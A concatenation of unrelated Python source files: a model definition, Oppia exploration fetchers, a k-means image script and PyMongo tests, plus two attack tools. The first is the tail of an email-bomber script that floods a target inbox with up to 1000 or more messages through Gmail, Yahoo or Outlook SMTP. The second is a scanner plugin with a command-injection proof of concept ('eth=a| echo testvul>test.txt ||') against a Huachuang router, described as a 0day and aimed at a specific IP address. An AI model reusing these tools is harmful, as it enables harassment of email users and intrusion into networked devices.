print(bColors.BLUE + '\n[+] Initializing bomber ...')
self.target = str(input(bColors.GREEN + '[:] Enter Target Email > '))
self.mode = int(input(bColors.GREEN + '[:] Enter BOMB mode (1,2,3,4) || 1:(1000) 2:(500) 3:(250) 4:('
'custom) > '))
if int(self.mode) > int(4) or int(self.mode) < int(1):
print(bColors.RED + '[-] ERROR: Invalid Option!')
sys.exit(0)
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def bomb(self):
try:
print(bColors.BLUE + '\n[+] Setting up bomb ...')
if self.mode == int(1):
self.amount = int(1000)
elif self.mode == int(2):
self.amount = int(500)
elif self.mode == int(3):
self.amount = int(250)
else:
self.amount = int(input(bColors.GREEN + '[:] Choose a CUSTOM amount > '))
print(bColors.GREEN + f'[+] You have selected BOMB mode {self.mode} and {self.amount} emails')
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def email(self):
try:
print(bColors.BLUE + '\n[+] Setting up email ...')
self.server = str(input(bColors.GREEN + '[:] Enter email server | or select premade options - 1:Gmail '
'2:Yahoo 3:Outlook 4:Custom > '))
defaultPort = True
if self.server == '4':
defaultPort = False
self.port = int(input(bColors.GREEN + '[:] Enter port number > '))
if defaultPort:
self.port = int(587)
if self.server == '1':
self.server = 'smtp.gmail.com'
elif self.server == '2':
self.server = 'smtp.mail.yahoo.com'
elif self.server == '3':
self.server = 'smtp-mail.outlook.com'
self.fromAddr = str(input(bColors.GREEN + '[:] Enter attacker email address > '))
self.fromPwd = str(input(bColors.GREEN + '[:] Enter attacker password > '))
self.subject = str(input(bColors.GREEN + '[:] Enter subject > '))
self.message = str(input(bColors.GREEN + '[:] Enter message > '))
if self.target == self.fromAddr:
print(bColors.RED + '\n[-] ERROR: Can\'t have same Attacker and Target address.')
self.msg = '''From: %s\nTo: %s\nSubject %s\n%s\n
''' % (self.fromAddr, self.target, self.subject, self.message)
self.s = smtplib.SMTP(self.server, self.port)
self.s.ehlo()
self.s.starttls()
self.s.ehlo()
self.s.login(self.fromAddr, self.fromPwd)
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def send(self):
try:
self.s.sendmail(self.fromAddr, self.target, self.message)
self.count += 1
# print(bColors.YELLOW + f'[+] BOMB: {self.count}')
sys.stdout.write(bColors.YELLOW + '\r' + f'[+] BOMBED {self.count} emails ' + ('.' * self.count))
# time.sleep(0.5)
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def attack(self):
print(bColors.BLUE + '\n[+] Attacking ...')
for email in range(self.amount):
self.send()
self.s.close()
print(bColors.YELLOW + '\n[+] Attack Finished !!')
sys.exit(0)
if __name__ == '__main__':
banner()
bomb = EmailBomber()
bomb.bomb()
bomb.email()
bomb.attack()
|
the-stack_0_25930
|
import torch.nn as nn
import torchvision.models as models
from exceptions.exceptions import InvalidBackboneError
class ResNetSimCLR(nn.Module):
def __init__(self, base_model, out_dim):
super(ResNetSimCLR, self).__init__()
self.resnet_dict = {"resnet18": models.resnet18(pretrained=False, num_classes=out_dim),
"resnet50": models.resnet50(pretrained=False, num_classes=out_dim),
"mobilev2": models.mobilenet_v2(pretrained=False, num_classes=out_dim),
"squeeznet": models.squeezenet1_1(pretrained=False, num_classes=128)}
self.backbone = self._get_basemodel(base_model)
if base_model == 'mobilev2':
dim_mlp = self.backbone.classifier[1].in_features
        elif base_model in ('resnet18', 'resnet50'):  # both ResNets expose their classifier as .fc
            dim_mlp = self.backbone.fc.in_features
# add mlp projection head
if base_model == 'mobilev2':
self.backbone.classifier[1] = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.backbone.classifier[1])
elif base_model == 'squeeznet':
self.backbone = self.backbone
else:
self.backbone.fc = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.backbone.fc)
def _get_basemodel(self, model_name):
try:
model = self.resnet_dict[model_name]
print(f'{model_name} Backbone Selected')
except KeyError:
            raise InvalidBackboneError(
                "Invalid backbone architecture. Check the config file and pass one of: resnet18, resnet50, mobilev2 or squeeznet")
else:
return model
def forward(self, x):
return self.backbone(x)
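# --- Illustrative usage sketch (assumed, not from the original repository) ---
# Builds the ResNet-18 variant with a 128-d projection head and runs a dummy
# batch through it; the 224x224 input size is an assumption for demonstration.
if __name__ == "__main__":
    import torch
    model = ResNetSimCLR(base_model="resnet18", out_dim=128)
    features = model(torch.randn(2, 3, 224, 224))
    print(features.shape)  # expected: torch.Size([2, 128])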
|
the-stack_0_25931
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands that can be used to fetch exploration related models.
All functions here should be agnostic of how ExplorationModel objects are
stored in the database. In particular, the various query methods should
delegate to the Exploration model class. This will enable the exploration
storage model to be changed without affecting this module and others above it.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import copy
import logging
from core import feconf
from core import python_utils
from core.domain import caching_services
from core.domain import exp_domain
from core.domain import subscription_services
from core.platform import models
(exp_models,) = models.Registry.import_models([models.NAMES.exploration])
datastore_services = models.Registry.import_datastore_services()
def _migrate_states_schema(versioned_exploration_states, init_state_name):
"""Holds the responsibility of performing a step-by-step, sequential update
of an exploration states structure based on the schema version of the input
exploration dictionary. This is very similar to the YAML conversion process
found in exp_domain.py and, in fact, many of the conversion functions for
states are also used in the YAML conversion pipeline. If the current
exploration states schema version changes
(feconf.CURRENT_STATE_SCHEMA_VERSION), a new conversion
function must be added and some code appended to this function to account
for that new version.
Args:
versioned_exploration_states: dict. A dict with two keys:
- states_schema_version: int. the states schema version for the
exploration.
- states: the dict of states comprising the exploration. The keys in
this dict are state names.
init_state_name: str. Name of initial state.
Raises:
Exception. The given states_schema_version is invalid.
"""
states_schema_version = versioned_exploration_states[
'states_schema_version']
if not (feconf.EARLIEST_SUPPORTED_STATE_SCHEMA_VERSION
<= states_schema_version
<= feconf.CURRENT_STATE_SCHEMA_VERSION):
raise Exception(
'Sorry, we can only process v%d-v%d exploration state schemas at '
'present.' % (
feconf.EARLIEST_SUPPORTED_STATE_SCHEMA_VERSION,
feconf.CURRENT_STATE_SCHEMA_VERSION))
while (states_schema_version <
feconf.CURRENT_STATE_SCHEMA_VERSION):
exp_domain.Exploration.update_states_from_model(
versioned_exploration_states,
states_schema_version, init_state_name)
states_schema_version += 1
def get_new_exploration_id():
"""Returns a new exploration id.
Returns:
str. A new exploration id.
"""
return exp_models.ExplorationModel.get_new_id('')
def get_multiple_versioned_exp_interaction_ids_mapping_by_version(
exp_id, version_numbers):
"""Returns a list of VersionedExplorationInteractionIdsMapping domain
objects corresponding to the specified versions.
Args:
exp_id: str. ID of the exploration.
version_numbers: list(int). List of version numbers.
Returns:
list(VersionedExplorationInteractionIdsMapping). List of Exploration
domain objects.
Raises:
Exception. One or more of the given versions of the exploration could
not be converted to the latest schema version.
"""
versioned_exp_interaction_ids_mapping = []
exploration_models = exp_models.ExplorationModel.get_multi_versions(
exp_id, version_numbers)
for index, exploration_model in enumerate(exploration_models):
if (exploration_model.states_schema_version !=
feconf.CURRENT_STATE_SCHEMA_VERSION):
raise Exception(
'Exploration(id=%s, version=%s, states_schema_version=%s) '
'does not match the latest schema version %s' % (
exp_id,
version_numbers[index],
exploration_model.states_schema_version,
feconf.CURRENT_STATE_SCHEMA_VERSION
))
states_to_interaction_id_mapping = {}
for state_name in exploration_model.states:
states_to_interaction_id_mapping[state_name] = (
exploration_model.states[state_name]['interaction']['id'])
versioned_exp_interaction_ids_mapping.append(
exp_domain.VersionedExplorationInteractionIdsMapping(
exploration_model.version,
states_to_interaction_id_mapping))
return versioned_exp_interaction_ids_mapping
def get_exploration_from_model(exploration_model, run_conversion=True):
"""Returns an Exploration domain object given an exploration model loaded
from the datastore.
If run_conversion is True, then the exploration's states schema version
will be checked against the current states schema version. If they do not
match, the exploration will be automatically updated to the latest states
schema version.
IMPORTANT NOTE TO DEVELOPERS: In general, run_conversion should never be
False. This option is only used for testing that the states schema version
migration works correctly, and it should never be changed otherwise.
Args:
exploration_model: ExplorationModel. An exploration storage model.
run_conversion: bool. When True, updates the exploration to the latest
states_schema_version if necessary.
Returns:
Exploration. The exploration domain object corresponding to the given
exploration model.
"""
# Ensure the original exploration model does not get altered.
versioned_exploration_states = {
'states_schema_version': exploration_model.states_schema_version,
'states': copy.deepcopy(exploration_model.states)
}
init_state_name = exploration_model.init_state_name
# If the exploration uses the latest states schema version, no conversion
# is necessary.
if (run_conversion and exploration_model.states_schema_version !=
feconf.CURRENT_STATE_SCHEMA_VERSION):
_migrate_states_schema(versioned_exploration_states, init_state_name)
return exp_domain.Exploration(
exploration_model.id, exploration_model.title,
exploration_model.category, exploration_model.objective,
exploration_model.language_code, exploration_model.tags,
exploration_model.blurb, exploration_model.author_notes,
versioned_exploration_states['states_schema_version'],
exploration_model.init_state_name,
versioned_exploration_states['states'],
exploration_model.param_specs, exploration_model.param_changes,
exploration_model.version, exploration_model.auto_tts_enabled,
exploration_model.correctness_feedback_enabled,
created_on=exploration_model.created_on,
last_updated=exploration_model.last_updated)
def get_exploration_summary_by_id(exploration_id):
"""Returns a domain object representing an exploration summary.
Args:
exploration_id: str. The id of the ExplorationSummary to be returned.
Returns:
ExplorationSummary. The summary domain object corresponding to the
given exploration.
"""
# TODO(msl): Maybe use memcache similarly to get_exploration_by_id.
exp_summary_model = exp_models.ExpSummaryModel.get(
exploration_id, strict=False)
if exp_summary_model:
exp_summary = get_exploration_summary_from_model(exp_summary_model)
return exp_summary
else:
return None
def get_exploration_summaries_from_models(exp_summary_models):
"""Returns a dict with ExplorationSummary domain objects as values,
keyed by their exploration id.
Args:
exp_summary_models: list(ExplorationSummary). List of ExplorationSummary
model instances.
Returns:
dict. The keys are exploration ids and the values are the corresponding
ExplorationSummary domain objects.
"""
exploration_summaries = [
get_exploration_summary_from_model(exp_summary_model)
for exp_summary_model in exp_summary_models]
result = {}
for exp_summary in exploration_summaries:
result[exp_summary.id] = exp_summary
return result
def get_exploration_summary_from_model(exp_summary_model):
"""Returns an ExplorationSummary domain object.
Args:
exp_summary_model: ExplorationSummary. An ExplorationSummary model
instance.
Returns:
        ExplorationSummary. The summary domain object corresponding to the
given exploration summary model.
"""
return exp_domain.ExplorationSummary(
exp_summary_model.id, exp_summary_model.title,
exp_summary_model.category, exp_summary_model.objective,
exp_summary_model.language_code, exp_summary_model.tags,
exp_summary_model.ratings, exp_summary_model.scaled_average_rating,
exp_summary_model.status, exp_summary_model.community_owned,
exp_summary_model.owner_ids, exp_summary_model.editor_ids,
exp_summary_model.voice_artist_ids, exp_summary_model.viewer_ids,
exp_summary_model.contributor_ids,
exp_summary_model.contributors_summary, exp_summary_model.version,
exp_summary_model.exploration_model_created_on,
exp_summary_model.exploration_model_last_updated,
exp_summary_model.first_published_msec,
exp_summary_model.deleted
)
def get_exploration_summaries_matching_ids(exp_ids):
"""Returns a list of ExplorationSummary domain objects (or None if the
corresponding summary does not exist) corresponding to the given
list of exploration ids.
Args:
exp_ids: list(str). List of exploration ids.
Returns:
list(ExplorationSummary|None). List of ExplorationSummary domain objects
corresponding to the given exploration ids. If an ExplorationSummary
does not exist, the corresponding returned list element is None.
"""
return [get_exploration_summary_from_model(model) if model else None
for model in exp_models.ExpSummaryModel.get_multi(exp_ids)]
def get_exploration_summaries_subscribed_to(user_id):
"""Returns a list of ExplorationSummary domain objects that the user
subscribes to.
Args:
user_id: str. The id of the user.
Returns:
list(ExplorationSummary). List of ExplorationSummary domain objects that
the user subscribes to.
"""
return [
summary for summary in
get_exploration_summaries_matching_ids(
subscription_services.get_exploration_ids_subscribed_to(user_id)
) if summary is not None
]
def get_exploration_by_id(exploration_id, strict=True, version=None):
"""Returns an Exploration domain object.
Args:
exploration_id: str. The id of the exploration to be returned.
strict: bool. Whether to fail noisily if no exploration with a given id
exists.
version: int or None. The version of the exploration to be returned.
If None, the latest version of the exploration is returned.
Returns:
Exploration. The domain object corresponding to the given exploration.
"""
sub_namespace = python_utils.UNICODE(version) if version else None
cached_exploration = caching_services.get_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION,
sub_namespace,
[exploration_id]
).get(exploration_id)
if cached_exploration is not None:
return cached_exploration
else:
exploration_model = exp_models.ExplorationModel.get(
exploration_id, strict=strict, version=version)
if exploration_model:
exploration = get_exploration_from_model(exploration_model)
caching_services.set_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION,
sub_namespace,
{
exploration_id: exploration
})
return exploration
else:
return None
def get_multiple_explorations_by_id(exp_ids, strict=True):
"""Returns a dict of domain objects representing explorations with the
given ids as keys. If an exp_id is not present, it is not included in the
return dict.
Args:
exp_ids: list(str). List of ids of the exploration to be returned.
strict: bool. If True, a ValueError is raised when any exploration id
is invalid.
Returns:
dict. Maps exploration ids to the corresponding Exploration domain
objects. Any invalid exploration ids are omitted.
Raises:
ValueError. When strict is True and at least one of the given exp_ids
is invalid.
"""
result = {}
uncached = []
cache_result = caching_services.get_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION, None, exp_ids)
for exp_obj in cache_result.values():
result[exp_obj.id] = exp_obj
for _id in exp_ids:
if _id not in result:
uncached.append(_id)
db_exp_models = exp_models.ExplorationModel.get_multi(uncached)
db_results_dict = {}
not_found = []
for i, eid in enumerate(uncached):
model = db_exp_models[i]
if model:
exploration = get_exploration_from_model(model)
db_results_dict[eid] = exploration
else:
logging.info(
'Tried to fetch exploration with id %s, but no such '
'exploration exists in the datastore' % eid)
not_found.append(eid)
if strict and not_found:
raise ValueError(
'Couldn\'t find explorations with the following ids:\n%s'
% '\n'.join(not_found))
cache_update = {
eid: results for eid, results in db_results_dict.items()
if results is not None
}
if cache_update:
caching_services.set_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION, None, cache_update)
result.update(db_results_dict)
return result
def get_exploration_summaries_where_user_has_role(user_id):
"""Returns a list of ExplorationSummary domain objects where the user has
some role.
Args:
user_id: str. The id of the user.
Returns:
list(ExplorationSummary). List of ExplorationSummary domain objects
where the user has some role.
"""
exp_summary_models = exp_models.ExpSummaryModel.query(
datastore_services.any_of(
exp_models.ExpSummaryModel.owner_ids == user_id,
exp_models.ExpSummaryModel.editor_ids == user_id,
exp_models.ExpSummaryModel.voice_artist_ids == user_id,
exp_models.ExpSummaryModel.viewer_ids == user_id,
exp_models.ExpSummaryModel.contributor_ids == user_id
)
).fetch()
return [
get_exploration_summary_from_model(exp_summary_model)
for exp_summary_model in exp_summary_models
]
|
the-stack_0_25932
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
# Decrease color depth (quantize each channel to 4 levels)
def dic_color(img):
img //= 63
img = img * 64 + 32
return img
# Database
def get_DB():
# get training image path
train = glob("dataset/train_*")
train.sort()
# prepare database
db = np.zeros((len(train), 13), dtype=np.int32)
pdb = []
# each train
for i, path in enumerate(train):
# read image
img = dic_color(cv2.imread(path))
# histogram
for j in range(4):
db[i, j] = len(np.where(img[..., 0] == (64 * j + 32))[0])
db[i, j+4] = len(np.where(img[..., 1] == (64 * j + 32))[0])
db[i, j+8] = len(np.where(img[..., 2] == (64 * j + 32))[0])
# get class
if 'akahara' in path:
cls = 0
elif 'madara' in path:
cls = 1
# store class label
db[i, -1] = cls
# add image path
pdb.append(path)
return db, pdb
# k-Means
def k_means(db, pdb, Class=2, th=0.5):
# copy database
feats = db.copy()
# initiate random seed
np.random.seed(4)
# assign random class
for i in range(len(feats)):
if np.random.random() < th:
feats[i, -1] = 0
else:
feats[i, -1] = 1
while True:
        # prepare gravity (centroid) accumulator
gs = np.zeros((Class, 12), dtype=np.float32)
change_count = 0
# compute gravity
for i in range(Class):
gs[i] = np.mean(feats[np.where(feats[..., -1] == i)[0], :12], axis=0)
# re-labeling
for i in range(len(feats)):
            # get distance to each gravity (centroid)
dis = np.sqrt(np.sum(np.square(np.abs(gs - feats[i, :12])), axis=1))
# get new label
pred = np.argmin(dis, axis=0)
            # if the new label differs from the old label
if int(feats[i, -1]) != pred:
change_count += 1
feats[i, -1] = pred
if change_count < 1:
break
for i in range(db.shape[0]):
print(pdb[i], " Pred:", feats[i, -1])
db, pdb = get_DB()
k_means(db, pdb, th=0.3)
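# A minimal sketch (illustrative, not part of the original script) of the
# re-labeling rule used in k_means above: each feature vector is assigned to
# the centroid ("gravity") with the smallest Euclidean distance.
def _nearest_centroid_demo():
    feats = np.array([[0.0, 0.0], [10.0, 10.0], [0.5, 0.5]])   # 3 feature vectors
    gs = np.array([[0.0, 0.0], [10.0, 10.0]])                  # 2 centroids
    # pairwise distances, shape (3 samples, 2 centroids)
    dis = np.sqrt(np.sum(np.square(feats[:, None, :] - gs[None, :, :]), axis=2))
    print(np.argmin(dis, axis=1))                              # -> [0 1 0]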
|
the-stack_0_25933
|
#!/usr/bin/env python
# coding: UTF-8
'''
author: yichin
name: 华创设备命令执行0day
refer: 0day
description:
华创的设备要被我玩坏了
POC:
http://foobar/acc/network/interface/check_interface_stat.php?eth=a| echo testvul>testvul.txt ||
'''
import urlparse
def assign(service, arg):
if service == 'huachuang_router':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
payload = arg + 'acc/network/interface/check_interface_stat.php?eth=a|%20echo%20testvul>test.txt%20||'
code, head, res, err, _ = curl.curl2(payload)
if code == 200:
code, head, res, err, _ = curl.curl2(arg + 'acc/network/interface/test.txt')
if code == 200 and 'testvul' in res:
security_hole('命令执行: ' + payload)
if __name__ == '__main__':
from dummy import *
audit(assign('huachuang_router','http://118.26.68.2/')[1])
|
the-stack_0_25935
|
# Copyright 2014 NEC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest import test
class VersionV3Test(base.BaseV3ComputeTest):
@test.attr(type='gate')
def test_version(self):
# Get version information
resp, version = self.version_client.get_version()
self.assertEqual(200, resp.status)
self.assertIn("id", version)
self.assertEqual("v3.0", version["id"])
|
the-stack_0_25936
|
import numpy as np
import cv2
# Create a black image
img = np.zeros((512, 512, 3), np.uint8)
# Draw a red circle
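# cv2.circle(image, center, radius, color, thickness): color is in BGR order,
# so (0, 0, 255) is red; thickness=-1 draws a filled circle.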
cv2.circle(img, (447, 63), 63, (0, 0, 255), -1)
cv2.imshow("Circle", img)
key = cv2.waitKey(0)
cv2.destroyAllWindows()
|
the-stack_0_25937
|
# coding: utf-8
"""
APIs Admin do Open Banking Brasil
    The administrative APIs are resources that can be consumed only by the directory for evaluating and controlling the quality of the services provided by the financial institutions # noqa: E501
OpenAPI spec version: 1.0.0-rc5.2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Links(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'_self': 'str',
'first': 'str',
'prev': 'str',
'next': 'str',
'last': 'str'
}
attribute_map = {
'_self': 'self',
'first': 'first',
'prev': 'prev',
'next': 'next',
'last': 'last'
}
def __init__(self, _self=None, first=None, prev=None, next=None, last=None): # noqa: E501
"""Links - a model defined in Swagger""" # noqa: E501
self.__self = None
self._first = None
self._prev = None
self._next = None
self._last = None
self.discriminator = None
if _self is not None:
self._self = _self
if first is not None:
self.first = first
if prev is not None:
self.prev = prev
if next is not None:
self.next = next
if last is not None:
self.last = last
@property
def _self(self):
"""Gets the _self of this Links. # noqa: E501
        URL of the currently requested page # noqa: E501
:return: The _self of this Links. # noqa: E501
:rtype: str
"""
return self.__self
@_self.setter
def _self(self, _self):
"""Sets the _self of this Links.
        URL of the currently requested page # noqa: E501
:param _self: The _self of this Links. # noqa: E501
:type: str
"""
self.__self = _self
@property
def first(self):
"""Gets the first of this Links. # noqa: E501
        URL of the first page of records # noqa: E501
:return: The first of this Links. # noqa: E501
:rtype: str
"""
return self._first
@first.setter
def first(self, first):
"""Sets the first of this Links.
        URL of the first page of records # noqa: E501
:param first: The first of this Links. # noqa: E501
:type: str
"""
self._first = first
@property
def prev(self):
"""Gets the prev of this Links. # noqa: E501
        URL of the previous page of records # noqa: E501
:return: The prev of this Links. # noqa: E501
:rtype: str
"""
return self._prev
@prev.setter
def prev(self, prev):
"""Sets the prev of this Links.
        URL of the previous page of records # noqa: E501
:param prev: The prev of this Links. # noqa: E501
:type: str
"""
self._prev = prev
@property
def next(self):
"""Gets the next of this Links. # noqa: E501
        URL of the next page of records # noqa: E501
:return: The next of this Links. # noqa: E501
:rtype: str
"""
return self._next
@next.setter
def next(self, next):
"""Sets the next of this Links.
        URL of the next page of records # noqa: E501
:param next: The next of this Links. # noqa: E501
:type: str
"""
self._next = next
@property
def last(self):
"""Gets the last of this Links. # noqa: E501
        URL of the last page of records # noqa: E501
:return: The last of this Links. # noqa: E501
:rtype: str
"""
return self._last
@last.setter
def last(self, last):
"""Sets the last of this Links.
        URL of the last page of records # noqa: E501
:param last: The last of this Links. # noqa: E501
:type: str
"""
self._last = last
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Links, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Links):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
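# --- Illustrative usage (assumed, not part of the generated client) ---
# The URLs below are placeholder values chosen purely for demonstration.
if __name__ == "__main__":
    links = Links(_self="https://api.example/page/2",
                  first="https://api.example/page/1",
                  next="https://api.example/page/3")
    print(links.to_dict())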
|
the-stack_0_25938
|
import multiprocessing as mp
import numpy as np
import pandas as pd
import pytest
import dask
from dask import dataframe as dd
from dask.dataframe.shuffle import partitioning_index
from distributed import Client
from distributed.deploy.local import LocalCluster
from dask_cuda.explicit_comms import (
CommsContext,
dataframe_merge,
dataframe_shuffle,
)
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice: all of the following tests are executed in a new process so that the
# UCX options of the different tests don't conflict.
async def my_rank(state):
return state["rank"]
def _test_local_cluster(protocol):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=4,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
comms = CommsContext(client)
assert sum(comms.run(my_rank)) == sum(range(4))
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_local_cluster(protocol):
p = mp.Process(target=_test_local_cluster, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
from cudf.tests.utils import assert_eq
else:
from dask.dataframe.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
nrows = n_workers * 10
# Let's make some dataframes that we can join on the "key" column
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame(
{"key": key[nrows // 3 :], "payload2": np.arange(nrows)[nrows // 3 :]}
)
expected = df1.merge(df2).set_index("key")
if backend == "cudf":
df1 = cudf.DataFrame.from_pandas(df1)
df2 = cudf.DataFrame.from_pandas(df2)
ddf1 = dd.from_pandas(df1, npartitions=n_workers + 1)
ddf2 = dd.from_pandas(
df2, npartitions=n_workers - 1 if n_workers > 1 else 1
)
ddf3 = dataframe_merge(ddf1, ddf2, on="key").set_index("key")
got = ddf3.compute()
if backend == "cudf":
assert_eq(got, expected)
else:
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_merge(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_merge, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge_empty_partitions(nrows, npartitions):
with LocalCluster(
protocol="tcp",
dashboard_address=None,
n_workers=npartitions,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame({"key": key, "payload2": np.arange(nrows)})
expected = df1.merge(df2).set_index("key")
ddf1 = dd.from_pandas(df1, npartitions=npartitions)
ddf2 = dd.from_pandas(df2, npartitions=npartitions)
ddf3 = dataframe_merge(ddf1, ddf2, on=["key"]).set_index("key")
got = ddf3.compute()
pd.testing.assert_frame_equal(got, expected)
def test_dataframe_merge_empty_partitions():
# Notice, we use more partitions than rows
p = mp.Process(target=_test_dataframe_merge_empty_partitions, args=(2, 4))
p.start()
p.join()
assert not p.exitcode
def check_partitions(df, npartitions):
"""Check that all values in `df` hashes to the same"""
hashes = partitioning_index(df, npartitions)
if len(hashes) > 0:
return len(hashes.unique()) == 1
else:
return True
def _test_dataframe_shuffle(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
nrows_per_worker = 5
np.random.seed(42)
df = pd.DataFrame({"key": np.random.random(n_workers * nrows_per_worker)})
if backend == "cudf":
df = cudf.DataFrame.from_pandas(df)
ddf = dd.from_pandas(df, npartitions=n_workers)
ddf = dataframe_shuffle(ddf, ["key"])
# Check that each partition of `ddf` hashes to the same value
result = ddf.map_partitions(check_partitions, n_workers).compute()
assert all(result.to_list())
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_shuffle(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_shuffle, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
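# A small illustrative sketch (not part of the test suite) of the invariant
# verified by check_partitions above: rows with equal keys always map to the
# same partition id under dask's partitioning_index.
def _partitioning_index_demo():
    df = pd.DataFrame({"key": [1, 2, 1, 2, 1]})
    print(partitioning_index(df, 4))  # equal keys receive equal partition ids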
|
the-stack_0_25940
|
# Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test some utilities for working with JSON and PyMongo."""
import datetime
import json
import re
import sys
import uuid
try:
import simplejson
HAS_SIMPLE_JSON = True
except ImportError:
HAS_SIMPLE_JSON = False
sys.path[0:0] = [""]
from pymongo.errors import ConfigurationError
from bson import json_util, EPOCH_AWARE, EPOCH_NAIVE, SON
from bson.json_util import (DatetimeRepresentation,
STRICT_JSON_OPTIONS)
from bson.binary import (Binary, MD5_SUBTYPE, USER_DEFINED_SUBTYPE,
JAVA_LEGACY, CSHARP_LEGACY, STANDARD)
from bson.code import Code
from bson.dbref import DBRef
from bson.int64 import Int64
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.objectid import ObjectId
from bson.regex import Regex
from bson.timestamp import Timestamp
from bson.tz_util import FixedOffset, utc
from test import unittest, IntegrationTest
PY3 = sys.version_info[0] == 3
PY26 = sys.version_info[:2] == (2, 6)
class TestJsonUtil(unittest.TestCase):
def round_tripped(self, doc, **kwargs):
return json_util.loads(json_util.dumps(doc, **kwargs), **kwargs)
def round_trip(self, doc, **kwargs):
self.assertEqual(doc, self.round_tripped(doc, **kwargs))
def test_basic(self):
self.round_trip({"hello": "world"})
def test_objectid(self):
self.round_trip({"id": ObjectId()})
def test_dbref(self):
self.round_trip({"ref": DBRef("foo", 5)})
self.round_trip({"ref": DBRef("foo", 5, "db")})
